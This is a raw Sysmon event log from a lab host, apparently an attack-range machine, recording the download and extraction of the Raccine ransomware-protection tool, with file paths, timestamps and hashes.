20:09:37.511{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x86.exe:Zone.Identifier2021-06-01 15:06:48.000 15241500x80000000000000001896287Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.403{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x86.exe2021-06-01 15:06:48.000MD5=7F5D52F979B732954E87C53DC9720FC0,SHA256=EA92C3F93BC063D6DA084FAA854C131E37F1F2CB585CD1E62A3DF9E03EACADFF,IMPHASH=8E2588A9CF43886DE3449DFFF03137B6- 254200x80000000000000001896286Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:37.401{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x86.exe2021-06-01 15:06:48.0002021-12-08 20:09:37.257 11241100x80000000000000001896285Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.258{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x86.exe2021-12-08 20:09:37.257 15241500x80000000000000001896284Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.256{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x64.exe:Zone.Identifier2021-06-01 15:06:46.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896283Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.255{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x64.exe:Zone.Identifier2021-06-01 15:06:46.000 15241500x80000000000000001896282Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.062{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x64.exe2021-06-01 15:06:46.000MD5=FB1CB75F59D98B5D1E1E31476CBE6F61,SHA256=A1592D3DA2B27230C087A3B069409C1E82C2664B0D4C3B511701624702B2E2A3,IMPHASH=1A5CDBF711FEE14B077E599D13FDDAB2- 254200x80000000000000001896280Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:37.060{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x64.exe2021-06-01 15:06:46.0002021-12-08 20:09:36.807 11241100x80000000000000001896279Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:36.807{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x64.exe2021-12-08 20:09:36.807 15241500x80000000000000001896278Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:36.805{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\NDP462-KB3151800-x86-x64-AllOS-ENU.exe:Zone.Identifier2021-06-01 15:06:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896277Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:36.805{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\NDP462-KB3151800-x86-x64-AllOS-ENU.exe:Zone.Identifier2021-06-01 15:06:52.000 15241500x80000000000000001896276Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:36.332{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\NDP462-KB3151800-x86-x64-AllOS-ENU.exe2021-06-01 15:06:52.000MD5=9A5D647EE710AF2B1AEDE329C40BBE1A,SHA256=28886593E3B32F018241A4C0B745E564526DBB3295CB2635944E3A393F4278D4,IMPHASH=F248EC36F6CEC966C3B020D2FCB9224B- 254200x80000000000000001896274Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:36.330{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\NDP462-KB3151800-x86-x64-AllOS-ENU.exe2021-06-01 15:06:52.0002021-12-08 20:09:35.709 11241100x80000000000000001896271Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.709{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\NDP462-KB3151800-x86-x64-AllOS-ENU.exe2021-12-08 20:09:35.709 11241100x80000000000000001896270Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.707{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq2021-12-08 20:09:35.707 15241500x80000000000000001896269Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.706{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine_x86.exe:Zone.Identifier2021-03-23 23:19:14.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896268Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.706{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine_x86.exe:Zone.Identifier2021-03-23 23:19:14.000 15241500x80000000000000001896267Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.703{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine_x86.exe2021-03-23 23:19:14.000MD5=6C8A8C4BC32E79840D50CB0A87C83B5E,SHA256=AEF89ECF82BEA84200E94C7206386733A0BD82A8AE47A38FC5E2D14E0B601B48,IMPHASH=84DDDC86C756653D8B4F70C15F4A430C- 254200x80000000000000001896266Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:35.701{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine_x86.exe2021-03-23 23:19:14.0002021-12-08 20:09:35.697 11241100x80000000000000001896265Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.697{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine_x86.exe2021-12-08 20:09:35.697 15241500x80000000000000001896264Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.696{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineSettings.exe:Zone.Identifier2020-11-14 12:15:06.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896263Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.696{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineSettings.exe:Zone.Identifier2020-11-14 12:15:06.000 15241500x80000000000000001896262Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.695{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineSettings.exe2020-11-14 12:15:06.000MD5=29BEFACEE533F2FEFB428C39412DF12C,SHA256=EC15047F8A802CF6CADB5EA3860C380BB3314E9A91A96464DC1837192773AB6A,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744- 254200x80000000000000001896261Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:35.693{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineSettings.exe2020-11-14 12:15:06.0002021-12-08 20:09:35.692 11241100x80000000000000001896260Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.692{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineSettings.exe2021-12-08 20:09:35.692 15241500x80000000000000001896259Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.691{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineRulesSync.exe:Zone.Identifier2020-12-21 18:16:46.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896258Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.691{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineRulesSync.exe:Zone.Identifier2020-12-21 18:16:46.000 15241500x80000000000000001896257Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.690{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineRulesSync.exe2020-12-21 18:16:46.000MD5=238ED776C03DDD1FEB1E3B3A024E5F33,SHA256=D767C82D9AD39A5AFDDF35DF4032AFD518B44804A492F9B49BA1E4A7535E87A7,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744- 254200x80000000000000001896256Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:35.688{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineRulesSync.exe2020-12-21 18:16:46.0002021-12-08 20:09:35.687 11241100x80000000000000001896255Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.688{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineRulesSync.exe2021-12-08 20:09:35.687 15241500x80000000000000001896254Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.686{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineElevatedCfg.exe:Zone.Identifier2020-12-21 18:11:22.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896253Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.686{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineElevatedCfg.exe:Zone.Identifier2020-12-21 18:11:22.000 15241500x80000000000000001896252Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.685{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineElevatedCfg.exe2020-12-21 18:11:22.000MD5=3F3708857D63F18C1C647A59D282F55E,SHA256=2EA9A0B9956FC315ABC9DEE68C2763C050EC630BB1617B4D5216DB785DA96E27,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744- 254200x80000000000000001896251Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:35.683{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineElevatedCfg.exe2020-12-21 18:11:22.0002021-12-08 20:09:35.682 11241100x80000000000000001896250Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.682{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\RaccineElevatedCfg.exe2021-12-08 20:09:35.682 15241500x80000000000000001896249Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.681{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine.exe:Zone.Identifier2021-03-23 22:17:14.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896248Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.681{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine.exe:Zone.Identifier2021-03-23 22:17:14.000 15241500x80000000000000001896247Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.678{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine.exe2021-03-23 22:17:14.000MD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24- 254200x80000000000000001896246Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:35.676{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine.exe2021-03-23 22:17:14.0002021-12-08 20:09:35.671 11241100x80000000000000001896245Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.671{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\Raccine.exe2021-12-08 20:09:35.671 15241500x80000000000000001896244Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.669{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat:Zone.Identifier2021-06-01 15:06:02.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896243Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.669{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat:Zone.Identifier2021-06-01 15:06:02.000 15241500x80000000000000001896242Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:35.669{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat2021-06-01 15:06:02.000MD5=BE970AA8B06EB4DC9D2E83D31A1DCB8E,SHA256=37AA4B39BB70E8A634E679276CBAF1DB491D37F67843272EE1E6762797D7FB9C,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896241Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.667{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat2021-12-08 20:09:35.667 11241100x80000000000000001896240Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.665{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine2021-12-08 20:09:35.665 11241100x80000000000000001896239Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:35.647{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine2021-12-08 20:09:35.647 11241100x80000000000000001896224Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:30.807{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Raccine.lnk2021-12-08 20:09:30.806 15241500x80000000000000001896124Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:23.394{9DBE88B5-643A-61AE-02AD-000000000E02}2396C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\Raccine.zip:Zone.Identifier2021-12-08 20:09:20.744MD5=7B693D294F242C484700935B8BDDBA14,SHA256=C15095EBCE92CE28AC28234A1F04D67950459F9EEAB9A4A7E6537327A4EA5D4D,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 ReferrerUrl=https://github.com/Neo23x0/Raccine/releases/tag/1.4.4 HostUrl=https://objects.githubusercontent.com/github-production-release-asset-2e65be/300864660/7cb0d980-c2eb-11eb-94df-7f37ace389dd?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211208%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20211208T200920Z&X-Amz-Expires=300&X-Amz-Signature=8d090b587426872ab5a9697221a4299bae7f83133001405e6a7d395f512f09ab&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=300864660&response-content-disposition=attachment%3B%20filename%3DRaccine.zip&response-content-type=application%2Foctet-stream 11241100x80000000000000001896123Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:23.394{9DBE88B5-643A-61AE-02AD-000000000E02}2396C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\Raccine.zip:Zone.Identifier2021-12-08 20:09:20.744 15241500x80000000000000001896122Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:22.606{9DBE88B5-643A-61AE-02AD-000000000E02}2396C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\Raccine.zip2021-12-08 20:09:20.744MD5=C31EFAC8F32904485A5E0D81363A67FC,SHA256=8B8524D99C41E32912669FF4BE7ABA713495AD3FC03E345C5A7E16D473718E48,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896112Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:22.169{9DBE88B5-643A-61AE-02AD-000000000E02}2396C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\Raccine.zip2021-12-08 20:09:22.169